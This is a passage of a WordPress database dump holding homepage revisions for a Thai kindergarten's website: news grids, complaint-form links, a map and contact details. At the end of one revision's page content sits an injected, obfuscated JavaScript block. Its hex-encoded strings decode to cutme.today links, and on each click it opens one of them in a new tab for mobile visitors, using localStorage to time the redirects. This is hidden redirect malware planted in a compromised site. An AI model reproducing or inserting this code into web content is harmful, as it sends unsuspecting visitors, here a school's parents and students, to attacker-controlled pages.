{\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:32:19','2025-10-26 09:32:19','',19,'http://watprato.ssk.in.th/?p=744',0,'revision','',0),
(745,1,'2025-10-26 16:32:33','2025-10-26 09:32:33','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\",\"align\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure 